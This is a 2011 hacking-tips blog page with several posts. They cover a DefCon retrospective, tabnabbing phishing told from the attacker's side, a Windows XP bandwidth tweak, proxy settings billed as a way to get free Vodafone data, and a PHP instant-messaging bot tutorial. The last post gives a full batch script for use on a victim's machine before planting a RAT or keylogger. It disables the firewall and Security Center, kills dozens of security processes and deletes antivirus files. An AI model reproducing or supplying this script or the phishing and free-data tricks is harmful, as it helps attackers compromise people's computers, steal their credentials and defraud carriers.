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Showing posts with label Hacking Tricks. Show all posts
Showing posts with label Hacking Tricks. Show all posts

Tuesday, August 30, 2011

When Hackers Become the Good Guys

At DefCon III in 1995, the young crowd of 470 spent their time jamming a local radio station broadcast and playing Hacker Jeopardy at midnight when they couldn't drink at the bar. "Free Kevin" stickers were plastered everywhere protesting the jailing of fugitive hacker Kevin Mitnick, and a 14-year-old ran away from home to attend the event. (I know because I was there.)
At DefCon 19 this year, plenty of the nearly 12,000 attendees had gray hair, most work as security professionals, and some even brought their children. Mitnick was there signing copies of his latest book, "Ghost in the Wires," and posing for photographs, before appearing as a guest on "The Colbert Report" last week.
A community is growing and growing up.
In the early years, DefCon founder Jeff Moss used to say "if you're 20 and you're working for The Man, you're a loser," Richard Thieme, author of "Mind Games" and a professional speaker, recounted in his DefCon talk this year and in an interview with CNET afterward. "Ten years ago, Moss said 'if you're 30 and you're not working for The Man, you're a loser.' And now he agreed that at 40 he is The Man.'"
Moss, aka "Dark Tangent," started DefCon in 1993 as a farewell party to a buddy, only to have it become the world's largest hacker conference. He sold off the more commercial Black Hat security conference, which frees him up for public service--he serves on the Homeland Security Advisory Council and was named the chief security officerfor the non-profit Internet Corporation for Assigned Names and Numbers (ICANN) earlier this year.
Another hacker role model who is having a very direct impact on U.S. cyber security policies and funding is Peiter Zatko, who was better known as "Mudge" when he was a member of The Cult of the Dead Cow (CDC) and L0pht hacker groups in the 1990s. He presented at a session on password cracking and holes in Microsoft software at DefCon in 1996. This year, he gave a keynote talk at Black Hat about his plans as program manager for the information innovation office at the Defense Department's DARPA (Defense Advances Research Projects Agency) to fund hacker spaces and small security start-ups.

Read more:

Thursday, August 11, 2011


Phishing attack is one of the best methods used for hacking email passwords. Aza Raskin introduced new way of Phishing called Tabnabbing.

Tabnabbing - New Type of Phishing Attack :

Tabnabbing is using the same phishing concepts which we were using previously. But, there are slight changes made to our conventional Phishing method.

Requirements for attack:

- The attacker must have a website.
- The attacker has to embed javascript file(necessary for phishing) in his website.
- Tabnabbing implements multi-tabbing advantage. So, user must browse with multiple tabs.

How Tabnabbing works???

- The user visits the attacker site which looks normal at first.
- The user switches from this attacker site tab and opens another site in new tab, leaving this attacker site tab open. Assume that user opens many tabs.
- While the user browses another site, the attacker site which is left open in previous tab changes or redirects itself to a phishing page say Gmail login.
- Now, when the user returns back to this tab, he may not remember exactly which site he had opened. He will now see fake Gmail login and will think that he has left this Gmail login tab open.
So, now, without checking out url of the site, the user is most probable of logging in to his account.
- Once he enters his login userid and password in our phisher, this information is sent to our inbox or any online account. Thus, his account hacked using this Tabnabbing.

How to protect yourself from Tabnabbing???

The most useful way to remain protected from such attacks is to reside on addons like Secure Login for logging in to any online account. So, when you return to attacker website(which has been redirected to phisher), the addon Secure Login will check for url and will show the message:

"No login data found for this page"

So, even if the attacker website has changed itself to phisher and the user has forgotten to check it's url, Secure Login will alert user that page is a phisher. Also, it is expected that various browsers will soon release a fix for this hack.

So friends, beware of this new phishing attack - Tabnabbing and protect your online accounts. Remember, Secure Login is the best solution to phishing attacks. If you have any views on this new phishing attack, please share it with us in comments.

Wednesday, August 3, 2011

Increase Broadband Speed Using Simple Tweak

A Simple Tweak (XP Pro only) which will increase your Broadband Speed.

Make sure you Log on as Administrator, not as a user with Administrator privileges.

Follow the steps as given below-

1) Click on Start Button.

2) Select Run From Start Menu.

3) Type gpedit.msc

4) Expand the [Administrative Templates] branch.

5) Then Expand the [Network] branch.

6) Highlight(Select by Single Click) [QoS Packet Scheduler]

7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)

8) Check(Select By Single Click on it) [Enabled]

9) Change [Bandwidth limit %] to 0 %

10) Click [OK] Button.

11) Restart Your PC.

12) Now Check Your Broadband Speed.

Vodafone Hack For Free GPRS

This method has been tested on different mobiles and has been confirmed to be working.
Followng are the Settings you require to configure on your Mobile:

Account Name: Vodafone_gprs
User Name: (no need)
Pass: (no need)

Access Point Settings :-
Proxy: Enabled
Proxy Address:
Proxy Port: 9401
Data Bearer: Packet Data

Bearer Settings :-
Packet Data Access Point: portalnmms
Network type: IPV4
Authentication: normal
User Name: (no need)
Password: (no need)

*IF that happen this settings is not working then change the proxy port number to:-

Proxy Port: 9401

Creating IM Bot

This quick tutorial will show you how to develop your own functional IM bot that works with Google Talk, Yahoo! Messenger, Windows Live and all other popular instant messaging clients.

To get started, all you need to know are some very basic programming skills (any language would do) and web space to host your "bot".

For this example, I have created a dummy bot called "insecure" that listens to your IM messages. To see this live, add to your GTalk buddy list and start chatting.

If you like to write a personal IM bot, just follow these simple steps:-

Step 1: Go to and register a new account with a bot.

Step 2: Now it's time to create a bot which is actually a simple script that resides on your public web server.
It could be in PHP, Perl, Python or any other language.

Example Hello World bot:
The example below illustrates just how easy it is to create a bot.
This example is coded in PHP.


switch ($_REQUEST['step']) {
case 1:
echo "Hi, what's your name?";
case 2:
echo "Hi " . $_REQUEST['value1'] . ", where do you live?";
case 3:
echo "Well, welcome to this hello world bot, " . $_REQUEST['value1'] . "<br>from " . $_REQUEST['value2'] . ".<reset>";


Step 3: Once your script is ready, put it somewhere on your web server and copy the full URL to the clipboard.

Step 4: Now login to your imified account, paste the script URL

Screen Name:
Bot Script URL:

Step 5: Add that im bot your friends list. That's it.

This is a very basic bot but the possibilities are endless.

For instance, you could write a bot that will send an email to all your close friends via a simple IM message. Or you could write one that will does currency conversion.

Sunday, July 31, 2011

How to disable Anti-Virus using batch file

When you attempt to hack someone's system by RAT, Keylogger or iStealer then you'll first need to FUD your server but its not that much easy to find a good & free working FUD crypter, So first disable your slave antivirus and firewall. So they can't find out your Trojan virus (Server). The below batch program helps you to disable all the running antivirus in the syste. Just save copy and paste it in notepad file and save it with .bat extension.

@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A SAFEWEB
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --

:) Hope you Like It. Just leave your comments below :)